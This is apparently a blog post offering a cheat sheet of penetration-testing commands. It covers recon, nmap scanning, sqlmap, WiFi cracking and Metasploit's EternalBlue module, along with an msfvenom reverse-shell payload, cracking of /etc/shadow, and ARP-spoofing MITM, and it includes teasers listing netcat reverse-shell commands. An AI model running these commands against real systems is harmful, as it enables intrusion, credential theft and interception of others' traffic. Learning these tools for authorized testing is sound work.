🔥 Ethical Hacking Command Guide

 

🔥 Ethical Hacking Command Guide

This guide covers essential ethical hacking commands for reconnaissance, scanning, exploitation, and more. 💻

🛠 1. Reconnaissance & OSINT (Information Gathering)

📌 WHOIS Lookup (Domain Info)

sh
whois example.com

Find domain registration details.

📌 DNS Lookup & Subdomain Enumeration

sh
nslookup example.com
dig example.com
host example.com

Find IP addresses & mail servers.

sh
sublist3r -d example.com

Find subdomains.

📌 Google Dorking (Search Engine Hacking)

sh
site:example.com filetype:pdf
intitle:"index of" passwords

Search for sensitive files & exposed directories.

📌 Find Open Ports (Shodan)

sh
shodan search "apache port:80"

Search exposed devices & services.

🔎 2. Network Scanning & Enumeration

📌 Scan Open Ports (Nmap)

sh
nmap -sS -p 1-65535 example.com

Stealth scan all ports.

sh
nmap -A -T4 example.com

Aggressive scan (OS detection, version detection).

📌 Detect Live Hosts in a Network

sh
fping -g 192.168.1.0/24

List active devices.

🌐 3. Web Application Security

📌 Web Vulnerability Scanner (Nikto)

sh
nikto -h http://example.com

Scan for vulnerabilities.

📌 SQL Injection Testing (SQLmap)

sh
sqlmap -u "http://example.com/page.php?id=1" --dbs

Detect & exploit SQL injection.

📌 XSS Vulnerability Scanner

sh
xsstrike -u "http://example.com/search?q=test"

Find XSS vulnerabilities.

📌 Directory Bruteforce (Gobuster)

sh
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt

Find hidden directories & files.

📶 4. Wireless Hacking

📌 Monitor WiFi Networks (Airodump-ng)

sh
airodump-ng wlan0mon

Capture WiFi packets.

📌 Crack WiFi (Aircrack-ng)

sh
aircrack-ng -a2 -b <BSSID> -w rockyou.txt capture.cap

Crack WPA2 password using a wordlist.

💀 5. Exploitation & Payloads

📌 Metasploit Framework (Start)

sh
msfconsole

Launch Metasploit.

📌 Find Exploits

sh
search exploit apache

Find Apache exploits.

📌 Exploit Windows SMB (EternalBlue)

sh
use exploit/windows/smb/ms17_010_eternalblue

📌 Create Payload (msfvenom)

sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe

Generate a Windows reverse shell payload.

🔐 6. Password Cracking

📌 Crack Password with Hashcat

sh
hashcat -m 0 -a 0 hash.txt rockyou.txt

Brute-force an MD5 hash.

📌 Crack Linux User Passwords

sh
john /etc/shadow --wordlist=rockyou.txt

🕵️‍♂️ 7. Man-in-the-Middle (MITM) Attacks

📌 ARP Spoofing (Bettercap)

sh
bettercap -iface eth0

Start MITM attack.

📌 Capture Traffic (Wireshark)

sh
tshark -i eth0

Monitor live traffic.

⚠️ 8. Anonymity & Privacy

📌 Browse Anonymously (Tor)

sh
tor
proxychains firefox

📌 Change MAC Address

sh
macchanger -r eth0

Randomize MAC address.

Comments

Post a Comment

Popular posts from this blog

Kali Linux Commands for Ethical Hacking Tools

  🔥 Kali Linux Commands for Ethical Hacking Tools Here’s a complete list of Kali Linux tools and their commands, categorized by Reconnaissance, Scanning, Exploitation, Wireless Attacks, Password Cracking, and Post-Exploitation . 🕵️ 1. Reconnaissance (Information Gathering) WHOIS Lookup sh Copy Edit whois example.com Get domain information. DNS Enumeration sh Copy Edit dig example.com nslookup example.com host example.com Find subdomains & DNS records. Subdomain Discovery sh Copy Edit sublist3r -d example.com List subdomains of a target. Network Scanning (Nmap) sh Copy Edit nmap -sS -p 1-65535 example.com nmap -A -T4 example.com Scan open ports & services. Netcat (Banner Grabbing & Reverse Shell) sh Copy Edit nc -v example.com 80 nc -lvnp 4444 🌐 2. Web Application Security Nikto (Web Vulnerability Scanner) sh Copy Edit nikto -h http://example.com Scan for vulnerabilities. SQL Injection (SQLmap) sh Copy Edit sqlmap -u "http:/...
Read more

A business-level SSL certificate typically falls under Organization Validation (OV)

 A business-level SSL certificate typically falls under Organization Validation (OV) SSL or Extended Validation (EV) SSL . These certificates require businesses to undergo a verification process , ensuring they are legally registered and operating. Example of a Business-Level SSL Certificate (EV SSL) 🔹 Common Name (CN): paypal.com 🔹 Organization (O): PayPal, Inc. 🔹 Organizational Unit (OU): Security Department 🔹 Country (C): US 🔹 State (S): California 🔹 Locality (L): San Jose 🔹 Issuer: DigiCert Inc 🔹 Certificate Type: Extended Validation (EV) SSL 💡 How to Identify a Business-Level SSL Certificate: Check the Certificate Details: Click the padlock icon in the browser’s address bar. View "Certificate (Valid)" → "Details" . Look for the Organization (O) field —it should contain a real business name . Extended Validation (EV) SSL Indicators: Some browsers (e.g., older versions of Safari) highlight the company name in the...
Read more